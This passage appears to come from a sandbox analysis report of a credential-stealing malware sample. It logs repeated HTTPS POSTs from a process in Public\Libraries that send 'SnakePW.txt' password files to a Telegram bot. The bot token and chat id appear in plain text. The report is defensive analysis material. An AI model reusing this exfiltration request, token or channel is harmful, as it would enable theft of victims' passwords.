                                                                                                                2024-11-26 07:25:39 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388876,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605939,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.749823149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:39 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e2c5dc4481c
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:39 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 32 63 35 64 63 34 34 38 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e2c5dc4481cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:40 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:40 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:40 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388878,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605940,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.749825149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:40 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ea1aff451e4
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:40 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 61 31 61 66 66 34 35 31 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ea1aff451e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:40 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:40 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:40 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388880,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605940,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.749828149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:40 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e18ff2f9f9e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:40 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 31 38 66 66 32 66 39 66 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e18ff2f9f9eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:41 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:41 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388882,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605941,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.749831149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:41 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e3f97e51cd2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:41 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 33 66 39 37 65 35 31 63 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e3f97e51cd2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:42 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:42 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:42 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388884,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605942,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.749832149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:42 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0eb5ee92c4e0
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:42 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 62 35 65 65 39 32 63 34 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0eb5ee92c4e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:42 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:42 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:42 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388886,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605942,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.749836149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:42 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e2c53de666f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:42 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 32 63 35 33 64 65 36 36 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e2c53de666fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:43 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:43 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388888,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605943,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                26192.168.2.749839149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:44 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e58399bf1a8
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:44 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 35 38 33 39 39 62 66 31 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e58399bf1a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:44 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:44 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
